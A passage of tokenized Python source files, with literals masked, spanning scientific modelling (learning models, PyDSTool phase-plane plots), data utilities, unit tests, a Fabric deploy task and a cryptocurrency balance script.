config_logging = False <EOL> exp . run ( ) <EOL> print "<STR_LIT>" , exp . result [ "<STR_LIT>" ] [ - <NUM_LIT:1> ] <EOL> assert exp . result [ "<STR_LIT>" ] [ - <NUM_LIT:1> ] > <NUM_LIT> </s>
<s> import pcd8544 . lcd as lcd <EOL> def demo ( ) : <EOL> lcd . locate ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> lcd . text ( map ( chr , range ( <NUM_LIT> , <NUM_LIT> ) ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> lcd . init ( ) <EOL> lcd . backlight ( <NUM_LIT:1> ) <EOL> demo ( ) </s>
<s> import pandas as pd <EOL> import numpy as np <EOL> from sklearn . feature_extraction import DictVectorizer <EOL> import alias <EOL> def explode ( cues ) : <EOL> if isinstance ( cues , basestring ) : <EOL> cues = cues . split ( '<STR_LIT:_>' ) <EOL> return { } . fromkeys ( cues , True ) <EOL> def orthoCoding ( strs , grams = <NUM_LIT:2> , sep = None ) : <EOL> if not np . iterable ( grams ) : <EOL> grams = [ grams ] <EOL> result = [ ] <EOL> for str in strs : <EOL> cues = [ ] <EOL> str = list ( str ) <EOL> for n in grams : <EOL> if n > <NUM_LIT:1> : <EOL> seq = [ '<STR_LIT:#>' ] + str + [ '<STR_LIT:#>' ] <EOL> else : <EOL> seq = str <EOL> count = max ( <NUM_LIT:0> , len ( seq ) - n + <NUM_LIT:1> ) <EOL> cues . extend ( '<STR_LIT>' . join ( seq [ i : i + n ] ) for i in xrange ( count ) ) <EOL> if sep : <EOL> result . append ( sep . join ( cues ) ) <EOL> else : <EOL> result . append ( tuple ( cues ) ) <EOL> return result <EOL> def danks ( data ) : <EOL> feats = DictVectorizer ( dtype = int , sparse = False ) <EOL> marginals = data . groupby ( '<STR_LIT>' , as_index = False ) . Frequency . sum ( ) <EOL> marginals = marginals . rename ( columns = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> data = pd . merge ( data , marginals , on = '<STR_LIT>' ) <EOL> result = pd . DataFrame ( ) <EOL> for outcome in data . Outcomes . unique ( ) : <EOL> yes = data [ data . Outcomes == outcome ] <EOL> M = feats . fit_transform ( [ explode ( c ) for c in yes . Cues ] ) <EOL> P = np . diag ( yes . Total / sum ( yes . Total ) ) <EOL> MTP = M . T . dot ( P ) <EOL> O = yes . Frequency / yes . Total <EOL> left = MTP . dot ( M ) <EOL> right = MTP . dot ( O ) <EOL> V = np . linalg . solve ( left , right ) <EOL> result [ outcome ] = V <EOL> result . index = feats . get_feature_names ( ) <EOL> return result <EOL> def ndl ( data ) : <EOL> vec = DictVectorizer ( dtype = float , sparse = False ) <EOL> D = vec . fit_transform ( [ explode ( c ) for c in data . Cues ] ) * data . Frequency [ : , np . 
newaxis ] <EOL> n = len ( vec . get_feature_names ( ) ) <EOL> C = np . zeros ( ( n , n ) ) <EOL> for row in D : <EOL> for nz in np . nonzero ( row ) : <EOL> C [ nz ] += row <EOL> Z = C . sum ( axis = <NUM_LIT:1> ) <EOL> C1 = C / Z [ : , np . newaxis ] <EOL> out = DictVectorizer ( dtype = float , sparse = False ) <EOL> X = out . fit_transform ( [ explode ( c ) for c in data . Outcomes ] ) * data . Frequency [ : , np . newaxis ] <EOL> O = np . zeros ( ( len ( vec . get_feature_names ( ) ) , len ( out . get_feature_names ( ) ) ) ) <EOL> for i in xrange ( len ( X ) ) : <EOL> for nz in np . nonzero ( D [ i ] ) : <EOL> O [ nz ] += X [ i ] <EOL> O1 = O / Z [ : , np . newaxis ] <EOL> W = np . linalg . pinv ( C1 ) . dot ( O1 ) <EOL> return pd . DataFrame ( W , columns = out . get_feature_names ( ) , index = vec . get_feature_names ( ) ) <EOL> def activation ( cues , W ) : <EOL> A = np . zeros ( len ( W . columns ) ) <EOL> if isinstance ( cues , basestring ) : <EOL> cues = cues . split ( '<STR_LIT:_>' ) <EOL> for cue in cues : <EOL> A += W . loc [ cue ] <EOL> return pd . Series ( A , index = W . columns ) <EOL> def activation ( cues , W ) : <EOL> if isinstance ( cues , basestring ) : <EOL> cues = cues . split ( '<STR_LIT:_>' ) <EOL> return W [ [ ( c in cues ) for c in W . index ] ] . sum ( ) <EOL> def _rwUpdate ( W , D , O , Alpha , Beta , Lambda ) : <EOL> Vtotal = np . dot ( W . T , D ) <EOL> L = O * Lambda <EOL> Vdelta = Alpha * Beta * ( L - Vtotal ) <EOL> W += D [ : , np . newaxis ] * Vdelta <EOL> try : <EOL> import _ndl <EOL> rwUpdate = _ndl . rwUpdate <EOL> except ImportError : <EOL> rwUpdate = _rwUpdate <EOL> def rw ( data , Alpha = <NUM_LIT:0.1> , Beta = <NUM_LIT:0.1> , Lambda = <NUM_LIT:1.0> , M = <NUM_LIT> , distribution = None , trajectory = False ) : <EOL> cues = DictVectorizer ( dtype = np . int , sparse = False ) <EOL> D = cues . fit_transform ( [ explode ( c ) for c in data . Cues ] ) <EOL> out = DictVectorizer ( dtype = np . 
int , sparse = False ) <EOL> O = out . fit_transform ( [ explode ( c ) for c in data . Outcomes ] ) <EOL> W = np . zeros ( ( len ( cues . get_feature_names ( ) ) , len ( out . get_feature_names ( ) ) ) ) <EOL> if distribution is None : <EOL> E = data . Frequency / sum ( data . Frequency ) <EOL> rand = alias . multinomial ( E ) <EOL> history = dict ( ) <EOL> i = <NUM_LIT:0> <EOL> while i < M : <EOL> i += <NUM_LIT:1> <EOL> if distribution is None : <EOL> item = rand . draw ( ) <EOL> else : <EOL> item = distribution ( ) - <NUM_LIT:1> <EOL> while item >= len ( data ) : <EOL> item = distribution ( ) - <NUM_LIT:1> <EOL> rwUpdate ( W , D [ item , : ] , O [ item , : ] , Alpha , Beta , Lambda ) <EOL> if trajectory : <EOL> history [ i ] = pd . DataFrame ( W , columns = out . get_feature_names ( ) , index = cues . get_feature_names ( ) , copy = True ) <EOL> if trajectory : <EOL> return pd . Panel . from_dict ( history ) <EOL> else : <EOL> return pd . DataFrame ( W , columns = out . get_feature_names ( ) , index = cues . get_feature_names ( ) ) </s>
<s> import codecs <EOL> try : <EOL> from setuptools import setup , find_packages <EOL> except ImportError : <EOL> from ez_setup import use_setuptools <EOL> use_setuptools ( ) <EOL> from setuptools import setup , find_packages <EOL> import media_bundler <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = media_bundler . __version__ , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> description = "<STR_LIT>" <EOL> + "<STR_LIT>" , <EOL> packages = find_packages ( ) , <EOL> zip_safe = False , <EOL> url = '<STR_LIT>' , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> long_description = "<STR_LIT>" , <EOL> ) </s>
<s> from __future__ import division <EOL> from WC_net import * <EOL> from PyDSTool . Toolbox . phaseplane import * <EOL> builder = rate_network ( ) <EOL> S = thresh_Naka_Rushton_fndef ( <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT:100> , with_if = False ) <EOL> builder . add_neuron ( '<STR_LIT>' , tau = <NUM_LIT:20> , ic = <NUM_LIT:15> , thresh_fn = S ) <EOL> builder . add_neuron ( '<STR_LIT>' , tau = <NUM_LIT:20> , ic = <NUM_LIT> , thresh_fn = S ) <EOL> builder . add_syn_input_to_neuron ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:3> ) <EOL> builder . add_syn_input_to_neuron ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:3> ) <EOL> net = builder . make_network ( ) <EOL> net . set ( tdata = [ <NUM_LIT:0> , <NUM_LIT> ] , <EOL> algparams = { '<STR_LIT>' : <NUM_LIT:0.5> } ) <EOL> traj = net . compute ( '<STR_LIT:test>' ) <EOL> pts = traj . sample ( ) <EOL> plt . plot ( pts [ '<STR_LIT:t>' ] , pts [ '<STR_LIT>' ] , '<STR_LIT:g>' ) <EOL> plt . plot ( pts [ '<STR_LIT:t>' ] , pts [ '<STR_LIT>' ] , '<STR_LIT:r>' ) <EOL> jac_fn = make_Jac ( net ) <EOL> fps = find_fixedpoints ( net , { '<STR_LIT>' : [ <NUM_LIT:0> , <NUM_LIT:200> ] , '<STR_LIT>' : [ <NUM_LIT:0> , <NUM_LIT:200> ] } , <EOL> jac = jac_fn , n = <NUM_LIT:6> ) <EOL> nullc_E1 , nullc_E2 = find_nullclines ( net , '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : [ <NUM_LIT:0> , <NUM_LIT:100> ] , '<STR_LIT>' : [ <NUM_LIT:0> , <NUM_LIT:100> ] } , <EOL> max_step = <NUM_LIT:1> , crop_tol_pc = <NUM_LIT:0> , <EOL> fps = fps , n = <NUM_LIT:3> , <EOL> jac = jac_fn ) <EOL> fp1 = fixedpoint_2D ( net , Point ( fps [ <NUM_LIT:0> ] ) , coords = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> eps = <NUM_LIT> , jac = jac_fn ) <EOL> plt . figure ( <NUM_LIT:2> ) <EOL> plt . plot ( nullc_E1 [ : , <NUM_LIT:0> ] , nullc_E1 [ : , <NUM_LIT:1> ] , label = '<STR_LIT>' ) <EOL> plt . plot ( nullc_E2 [ : , <NUM_LIT:0> ] , nullc_E2 [ : , <NUM_LIT:1> ] , label = '<STR_LIT>' ) <EOL> plt . plot ( pts [ '<STR_LIT>' ] , pts [ '<STR_LIT>' ] , '<STR_LIT:k>' ) <EOL> plt . 
plot ( pts [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , pts [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> plt . plot ( pts [ '<STR_LIT>' ] [ - <NUM_LIT:1> ] , pts [ '<STR_LIT>' ] [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> plt . legend ( loc = '<STR_LIT>' ) <EOL> plt . show ( ) </s>
<s> import PyDSTool as dst <EOL> from PyDSTool import args <EOL> import numpy as np <EOL> from matplotlib import pyplot as plt <EOL> pars = { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT:a>' : <NUM_LIT:0.5> } <EOL> icdict = { '<STR_LIT:x>' : pars [ '<STR_LIT:a>' ] , <EOL> '<STR_LIT:y>' : pars [ '<STR_LIT:a>' ] - pars [ '<STR_LIT:a>' ] ** <NUM_LIT:3> / <NUM_LIT:3> } <EOL> xstr = '<STR_LIT>' <EOL> ystr = '<STR_LIT>' <EOL> event_x_a = dst . makeZeroCrossEvent ( '<STR_LIT>' , <NUM_LIT:0> , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True } , <EOL> varnames = [ '<STR_LIT:x>' ] , parnames = [ '<STR_LIT:a>' ] , <EOL> targetlang = '<STR_LIT>' ) <EOL> DSargs = args ( name = '<STR_LIT>' ) <EOL> DSargs . events = [ event_x_a ] <EOL> DSargs . pars = pars <EOL> DSargs . tdata = [ <NUM_LIT:0> , <NUM_LIT:3> ] <EOL> DSargs . algparams = { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : True } <EOL> DSargs . varspecs = { '<STR_LIT:x>' : xstr , '<STR_LIT:y>' : ystr } <EOL> DSargs . xdomain = { '<STR_LIT:x>' : [ - <NUM_LIT> , <NUM_LIT> ] , '<STR_LIT:y>' : [ - <NUM_LIT:2> , <NUM_LIT:2> ] } <EOL> DSargs . fnspecs = { '<STR_LIT>' : ( [ '<STR_LIT:t>' , '<STR_LIT:x>' , '<STR_LIT:y>' ] , <EOL> """<STR_LIT>""" ) } <EOL> DSargs . ics = icdict <EOL> vdp = dst . Vode_ODEsystem ( DSargs ) <EOL> traj = vdp . compute ( '<STR_LIT>' ) <EOL> pts = traj . sample ( ) <EOL> evs = traj . getEvents ( '<STR_LIT>' ) <EOL> plt . figure ( <NUM_LIT:1> ) <EOL> plt . plot ( pts [ '<STR_LIT:t>' ] , pts [ '<STR_LIT:x>' ] , '<STR_LIT:b>' , linewidth = <NUM_LIT:2> ) <EOL> plt . plot ( pts [ '<STR_LIT:t>' ] , pts [ '<STR_LIT:y>' ] , '<STR_LIT:r>' , linewidth = <NUM_LIT:2> ) <EOL> plt . figure ( <NUM_LIT:2> ) <EOL> from PyDSTool . Toolbox import phaseplane as pp <EOL> pp . plot_PP_vf ( vdp , '<STR_LIT:x>' , '<STR_LIT:y>' , scale_exp = - <NUM_LIT:1> ) <EOL> fp_coord = pp . 
find_fixedpoints ( vdp , n = <NUM_LIT:4> , eps = <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> fp = pp . fixedpoint_2D ( vdp , dst . Point ( fp_coord ) , eps = <NUM_LIT> ) <EOL> nulls_x , nulls_y = pp . find_nullclines ( vdp , '<STR_LIT:x>' , '<STR_LIT:y>' , n = <NUM_LIT:3> , eps = <NUM_LIT> , <EOL> max_step = <NUM_LIT:0.1> , fps = [ fp_coord ] ) <EOL> pp . plot_PP_fps ( fp ) <EOL> plt . plot ( nulls_x [ : , <NUM_LIT:0> ] , nulls_x [ : , <NUM_LIT:1> ] , '<STR_LIT:b>' ) <EOL> plt . plot ( nulls_y [ : , <NUM_LIT:0> ] , nulls_y [ : , <NUM_LIT:1> ] , '<STR_LIT:g>' ) <EOL> plt . plot ( pts [ '<STR_LIT:x>' ] , pts [ '<STR_LIT:y>' ] , '<STR_LIT>' , linewidth = <NUM_LIT:2> ) <EOL> plt . plot ( evs [ '<STR_LIT:x>' ] , evs [ '<STR_LIT:y>' ] , '<STR_LIT>' ) <EOL> plt . axis ( '<STR_LIT>' ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . xlabel ( '<STR_LIT:x>' ) <EOL> plt . ylabel ( '<STR_LIT:y>' ) <EOL> plt . figure ( <NUM_LIT:3> ) <EOL> vdp . set ( tdata = [ <NUM_LIT:0> , <NUM_LIT:30> ] , <EOL> xdomain = { '<STR_LIT:y>' : [ - <NUM_LIT:8> , <NUM_LIT:8> ] } , <EOL> algparams = { '<STR_LIT>' : <NUM_LIT> } ) <EOL> for eps in np . power ( <NUM_LIT:10> , np . linspace ( - <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT:6> ) ) : <EOL> vdp . set ( pars = { '<STR_LIT>' : eps } , <EOL> tdata = [ <NUM_LIT:0> , vdp . tdata [ <NUM_LIT:1> ] + <NUM_LIT> ] ) <EOL> traj = vdp . compute ( '<STR_LIT>' % eps ) <EOL> pts = traj . sample ( ) <EOL> event_dict = pts . labels . by_label [ '<STR_LIT>' ] <EOL> indices = np . sort ( event_dict . keys ( ) ) <EOL> ix1 , ix2 , ix3 = indices [ - <NUM_LIT:3> : ] <EOL> plt . plot ( pts [ '<STR_LIT:x>' ] [ ix1 : ix3 + <NUM_LIT:1> ] , pts [ '<STR_LIT:y>' ] [ ix1 : ix3 + <NUM_LIT:1> ] , label = '<STR_LIT>' % eps ) <EOL> nulls_x , nulls_y = pp . find_nullclines ( vdp , '<STR_LIT:x>' , '<STR_LIT:y>' , n = <NUM_LIT:3> , eps = <NUM_LIT> , <EOL> max_step = <NUM_LIT> , fps = [ fp_coord ] ) <EOL> plt . 
plot ( nulls_x [ : , <NUM_LIT:0> ] , nulls_x [ : , <NUM_LIT:1> ] , '<STR_LIT:k>' , lw = <NUM_LIT:2> ) <EOL> plt . plot ( nulls_y [ : , <NUM_LIT:0> ] , nulls_y [ : , <NUM_LIT:1> ] , '<STR_LIT:k>' , lw = <NUM_LIT:2> ) <EOL> pp . plot_PP_fps ( fp ) <EOL> plt . axis ( '<STR_LIT>' ) <EOL> plt . title ( '<STR_LIT>' ) <EOL> plt . xlabel ( '<STR_LIT:x>' ) <EOL> plt . ylabel ( '<STR_LIT:y>' ) <EOL> plt . legend ( loc = <NUM_LIT:3> ) <EOL> plt . show ( ) </s>
<s> from PyDSTool import * <EOL> from common_lib import * <EOL> thresh_ev = Events . makeZeroCrossEvent ( '<STR_LIT>' , <NUM_LIT:1> , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False } , <EOL> varnames = [ '<STR_LIT:x>' ] ) <EOL> unused_ev = Events . makeZeroCrossEvent ( '<STR_LIT>' , <NUM_LIT:1> , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False } , <EOL> varnames = [ '<STR_LIT:x>' ] ) <EOL> DSargs = { '<STR_LIT>' : [ <NUM_LIT:0> , <NUM_LIT:20> ] , <EOL> '<STR_LIT>' : { '<STR_LIT:k>' : <NUM_LIT:0> , '<STR_LIT:a>' : <NUM_LIT:0> } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT:strict>' : False } , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { "<STR_LIT:x>" : "<STR_LIT>" } , <EOL> '<STR_LIT>' : [ thresh_ev , unused_ev ] <EOL> } <EOL> testODE = Vode_ODEsystem ( DSargs ) <EOL> protocol = [ ] <EOL> protocol . append ( { '<STR_LIT>' : { '<STR_LIT:x>' : <NUM_LIT:0> } , <EOL> '<STR_LIT>' : { '<STR_LIT:k>' : <NUM_LIT:0> , '<STR_LIT:a>' : <NUM_LIT:1> } , <EOL> '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> protocol . append ( { '<STR_LIT>' : { '<STR_LIT:x>' : <NUM_LIT:0> } , <EOL> '<STR_LIT>' : { '<STR_LIT:k>' : <NUM_LIT:0> , '<STR_LIT:a>' : <NUM_LIT:1> } , <EOL> '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> protocol . append ( { '<STR_LIT>' : { '<STR_LIT:x>' : <NUM_LIT:0> } , <EOL> '<STR_LIT>' : { '<STR_LIT:k>' : <NUM_LIT:0> , '<STR_LIT:a>' : <NUM_LIT:1> } , <EOL> '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> traj , pts = pcw_protocol ( testODE , protocol ) <EOL> plot ( pts [ '<STR_LIT:t>' ] , pts [ '<STR_LIT:x>' ] ) <EOL> show ( ) </s>
<s> from collections import Counter <EOL> import pandas as pd <EOL> import numpy as np <EOL> def sigma_edit_series ( sigma_thresh , in_series , iter_counter = None , max_iter = <NUM_LIT:20> ) : <EOL> iter_counter = Counter ( ) if iter_counter is None else iter_counter <EOL> if in_series . count ( ) == <NUM_LIT:0> : <EOL> msg = "<STR_LIT>" <EOL> raise ValueError ( msg ) <EOL> iter_counter . update ( '<STR_LIT:n>' ) <EOL> if iter_counter [ '<STR_LIT:n>' ] > max_iter : <EOL> msg = "<STR_LIT>" <EOL> raise ValueError ( msg ) <EOL> resid = in_series - in_series . mean ( ) <EOL> std = resid . std ( ) <EOL> sigma_t = sigma_thresh * std <EOL> outside = resid . abs ( ) >= sigma_t <EOL> if any ( outside ) : <EOL> in_series . loc [ outside ] = np . NaN <EOL> in_series = sigma_edit_series ( <EOL> sigma_thresh , in_series , iter_counter , max_iter ) <EOL> return in_series <EOL> def ensure_col_exists ( df , col , df_name = '<STR_LIT>' ) : <EOL> if not df . empty and col not in list ( df . columns ) : <EOL> msg = '<STR_LIT>' . format ( <EOL> df_name , repr ( col ) ) <EOL> raise ValueError ( msg ) <EOL> def sigma_edit_dataframe ( sigma_thresh , columns , df , max_iter = <NUM_LIT:20> ) : <EOL> """<STR_LIT>""" <EOL> pd . options . mode . chained_assignment = None <EOL> for col in columns : <EOL> ensure_col_exists ( df , col , '<STR_LIT>' ) <EOL> ser = df [ col ] <EOL> df . loc [ : , col ] = sigma_edit_series ( sigma_thresh , ser , max_iter = max_iter ) <EOL> return df </s>
<s> from mock import patch , MagicMock <EOL> from unittest import TestCase <EOL> import pandas as pd <EOL> from pandashells . bin . p_smooth import main , get_input_args , validate_args <EOL> class GetInputArgsTests ( TestCase ) : <EOL> @ patch ( '<STR_LIT>' , '<STR_LIT>' . split ( ) ) <EOL> def test_right_number_of_args ( self ) : <EOL> args = get_input_args ( ) <EOL> self . assertEqual ( len ( args . __dict__ ) , <NUM_LIT:6> ) <EOL> class ValidateArgs ( TestCase ) : <EOL> def test_okay ( self ) : <EOL> args = MagicMock ( quiet = False ) <EOL> cols = [ '<STR_LIT:a>' ] <EOL> df = MagicMock ( columns = [ '<STR_LIT:a>' ] ) <EOL> validate_args ( args , cols , df ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_bad_cols ( self , stderr_mock ) : <EOL> args = MagicMock ( quiet = False ) <EOL> cols = [ '<STR_LIT:b>' ] <EOL> df = MagicMock ( columns = [ '<STR_LIT:a>' ] ) <EOL> with self . assertRaises ( SystemExit ) : <EOL> validate_args ( args , cols , df ) <EOL> class MainTests ( TestCase ) : <EOL> @ patch ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . split ( ) ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_cli ( self , df_from_input_mock , df_to_output_mock ) : <EOL> df_in = pd . DataFrame ( { <EOL> '<STR_LIT:x>' : range ( <NUM_LIT:1> , <NUM_LIT> ) , <EOL> '<STR_LIT:y>' : range ( <NUM_LIT:1> , <NUM_LIT> ) , <EOL> } ) <EOL> df_from_input_mock . return_value = df_in <EOL> main ( ) <EOL> dfout = df_to_output_mock <EOL> self . assertEqual ( <EOL> list ( dfout . call_args_list [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] . columns ) , [ '<STR_LIT:x>' , '<STR_LIT:y>' ] ) </s>
<s> import logging <EOL> import click <EOL> from sqlalchemy . exc import IntegrityError <EOL> from chanjo . load import link as link_mod <EOL> from chanjo import load <EOL> from chanjo . parse import bed <EOL> from chanjo . store import Store <EOL> from chanjo . utils import validate_stdin <EOL> from chanjo . store . models import BASE <EOL> from chanjo . store . txmodels import BASE as TXBASE <EOL> logger = logging . getLogger ( __name__ ) <EOL> @ click . command ( ) <EOL> @ click . option ( '<STR_LIT>' , '<STR_LIT>' , is_flag = True , <EOL> help = '<STR_LIT>' ) <EOL> @ click . argument ( '<STR_LIT>' , callback = validate_stdin , <EOL> type = click . File ( encoding = '<STR_LIT:utf-8>' ) , default = '<STR_LIT:->' , required = False ) <EOL> @ click . pass_context <EOL> def link ( context , transcripts , bed_stream ) : <EOL> """<STR_LIT>""" <EOL> only_tx = transcripts or context . obj . get ( '<STR_LIT>' ) or False <EOL> base = TXBASE if only_tx else BASE <EOL> chanjo_db = Store ( uri = context . obj [ '<STR_LIT>' ] , base = base ) <EOL> try : <EOL> if only_tx : <EOL> result = load . link_transcripts ( bed_stream ) <EOL> with click . progressbar ( result . models , length = result . count , <EOL> label = '<STR_LIT>' ) as bar : <EOL> for tx_model in bar : <EOL> chanjo_db . session . add ( tx_model ) <EOL> chanjo_db . save ( ) <EOL> else : <EOL> link_elements ( chanjo_db , bed_stream ) <EOL> except IntegrityError : <EOL> click . echo ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def link_elements ( chanjo_db , bed_iterable , batch_size = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> rows = bed . chanjo ( bed_iterable ) <EOL> stats = link_mod . rows ( chanjo_db . session , rows ) <EOL> for index , stat in enumerate ( stats ) : <EOL> chanjo_db . add ( stat ) <EOL> if index % batch_size == <NUM_LIT:0> : <EOL> chanjo_db . save ( ) <EOL> logger . debug ( '<STR_LIT>' , index ) <EOL> chanjo_db . save ( ) </s>
<s> from . api import ChanjoAPI <EOL> from . core import Store <EOL> from . models import ( Exon , ExonStatistic , Exon_Transcript , Gene , Sample , <EOL> Transcript ) </s>
<s> import os <EOL> from fabric . api import env , run , put , local , roles <EOL> env . hosts = [ '<STR_LIT>' ] <EOL> env . roledefs = { '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> env . user = '<STR_LIT>' <EOL> @ roles ( '<STR_LIT>' ) <EOL> def deploy ( ) : <EOL> local ( '<STR_LIT>' ) <EOL> local ( '<STR_LIT>' ) <EOL> dist_files = os . listdir ( '<STR_LIT>' ) <EOL> filename = dist_files [ <NUM_LIT:0> ] <EOL> local_filename = '<STR_LIT>' % filename <EOL> remote_filename = '<STR_LIT>' % filename <EOL> put ( local_filename , remote_filename ) </s>
<s> from tempfile import mkdtemp <EOL> from git import Repo <EOL> from jig . tests . testcase import JigTestCase <EOL> from jig . plugins import initializer <EOL> from jig . gitutils . checks import ( <EOL> is_git_repo , repo_jiginitialized , working_directory_dirty ) <EOL> class TestIsGitRepo ( JigTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_is_not_git_directory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( is_git_repo ( mkdtemp ( ) ) ) <EOL> def test_is_git_directory ( self ) : <EOL> """<STR_LIT>""" <EOL> directory = mkdtemp ( ) <EOL> Repo . init ( directory ) <EOL> self . assertTrue ( is_git_repo ( directory ) ) <EOL> class TestRepoJiginitialized ( JigTestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_is_not_jig_initialized_directory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( repo_jiginitialized ( mkdtemp ( ) ) ) <EOL> def test_is_jig_initialized_directory ( self ) : <EOL> """<STR_LIT>""" <EOL> directory = mkdtemp ( ) <EOL> Repo . init ( directory ) <EOL> initializer ( directory ) <EOL> self . assertTrue ( repo_jiginitialized ( directory ) ) <EOL> class TestWorkingDirctoryDirty ( JigTestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( TestWorkingDirctoryDirty , self ) . setUp ( ) <EOL> self . commit ( self . gitrepodir , '<STR_LIT>' , '<STR_LIT:a>' ) <EOL> self . commit ( self . gitrepodir , '<STR_LIT>' , '<STR_LIT:b>' ) <EOL> self . commit ( self . gitrepodir , '<STR_LIT>' , '<STR_LIT:c>' ) <EOL> def test_directory_is_clean ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( working_directory_dirty ( self . gitrepodir ) ) <EOL> def test_directory_has_modified_file ( self ) : <EOL> """<STR_LIT>""" <EOL> self . modify_file ( self . gitrepodir , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertTrue ( working_directory_dirty ( self . gitrepodir ) ) <EOL> def test_directory_has_untracked_file ( self ) : <EOL> """<STR_LIT>""" <EOL> self . create_file ( self . 
gitrepodir , '<STR_LIT>' , '<STR_LIT:d>' ) <EOL> self . assertFalse ( working_directory_dirty ( self . gitrepodir ) ) </s>
<s> """<STR_LIT>""" <EOL> import urllib . request <EOL> import models <EOL> import json <EOL> import sys <EOL> from decimal import * <EOL> from urllib . error import URLError , HTTPError <EOL> getcontext ( ) . prec = <NUM_LIT:8> <EOL> def get_bitstamp_price ( ) : <EOL> """<STR_LIT>""" <EOL> req = urllib . request . urlopen ( '<STR_LIT>' ) <EOL> ret = req . read ( ) . decode ( ) <EOL> ret = json . loads ( ret ) <EOL> return Decimal ( ret [ '<STR_LIT>' ] ) <EOL> def get_balances ( ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( get_balances , '<STR_LIT>' ) : <EOL> bals = models . Wallet . get_balances ( ) <EOL> for bal in bals : <EOL> bal . amount += bal . held <EOL> bal . held = Decimal ( <NUM_LIT:0> ) <EOL> get_balances . _balances = bals <EOL> return get_balances . _balances <EOL> def get_amt_in_btc ( bal ) : <EOL> """<STR_LIT>""" <EOL> if bal . currency . abbreviation == '<STR_LIT>' : <EOL> return bal . amount <EOL> for exchange in models . Exchange . get_all ( ) : <EOL> to_correct = exchange . to_currency == bal . currency <EOL> from_correct = exchange . from_currency . abbreviation == '<STR_LIT>' <EOL> if to_correct and from_correct : <EOL> break <EOL> else : <EOL> raise ValueError ( <EOL> '<STR_LIT>' . format ( <EOL> bal . currency . abbreviation <EOL> ) <EOL> ) <EOL> ordr = exchange . get_highest_bid ( ) <EOL> return Decimal ( bal . amount * ordr . rate ) <EOL> def get_amt_in_usd ( btc ) : <EOL> """<STR_LIT>""" <EOL> return Decimal ( btc * get_bitstamp_price ( ) ) <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> btc = Decimal ( <NUM_LIT:0> ) <EOL> try : <EOL> for balance in get_balances ( ) : <EOL> try : <EOL> btc += get_amt_in_btc ( balance ) <EOL> except ValueError : <EOL> sys . stderr . write ( <EOL> '<STR_LIT>' . format ( <EOL> balance . currency . abbreviation <EOL> ) <EOL> ) <EOL> pass <EOL> except HTTPError as e : <EOL> print ( "<STR_LIT>" . format ( e . code ) ) <EOL> print ( "<STR_LIT>" ) <EOL> return <EOL> btc_str = '<STR_LIT>' . 
format ( btc ) <EOL> print ( '<STR_LIT>' . format ( btc_str ) ) <EOL> try : <EOL> usd = get_amt_in_usd ( btc ) <EOL> except HTTPError as e : <EOL> print ( "<STR_LIT>" . format ( e . code ) ) <EOL> print ( "<STR_LIT>" ) <EOL> return <EOL> usd_str = '<STR_LIT>' . format ( usd ) <EOL> print ( '<STR_LIT>' . format ( usd_str ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
